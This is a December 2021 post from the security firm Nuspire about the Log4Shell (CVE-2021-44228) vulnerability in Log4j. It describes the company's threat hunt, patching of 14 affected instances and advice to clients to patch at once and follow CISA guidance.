Tuesday, Dec 14, 2021
BY: Team Nuspire
A new zero-day vulnerability in Log4j, an open-source Java library that provides logging capabilities, was recently discovered. Called “CVE-2021-44228” or “Log4Shell,” the vulnerability could be used by bad actors to take control of Java-based web servers and launch attacks that could give them control of entire computer servers. Log4Shell has been graded a 10 of 10 (Critical) on the CVSSv3 severity scale, as it is remotely exploitable and requires little technical skill to execute.
What Nuspire Clients Need to Know
The Log4Shell attack prompted an emergency security update from the Apache Software Foundation. Nuspire published a threat brief with details covering this vulnerability including an executive summary, recommendations and links to the patch.
Upon discovery of the exploit, Nuspire immediately launched an internal risk assessment combined with an inventory of our internal and third-party use of Log4j. Concurrently, we launched an internal threat hunt on Dec. 10 to search for known strings that indicate an exploitation attempt against the vulnerability. This threat hunt was updated on Dec. 14 to include a list of IP addresses known by our open- and closed-source threat intelligence to be scanning for vulnerable assets.
Additionally, we began an emergency patching cycle against our vulnerable assets, prioritized by risk. We identified 14 instances of Log4J in our environment. At this time, we have patched vulnerable systems or mitigated the vulnerability by protections, such as ensuring Java Security Manager is installed and blocking exploitation of the vulnerability.
Finally, we are taking steps to ensure our threat hunts are continuously updated as more information becomes available. We encourage all of our clients to follow Nuspire threat briefs as well as following the guidance issued by the Cybersecurity & Infrastructure Security Agency (CISA) regarding the vulnerability.
Our recommendation to our clients is to immediately patch any vulnerable instances of Log4J, as this vulnerability is likely to be actively exploited.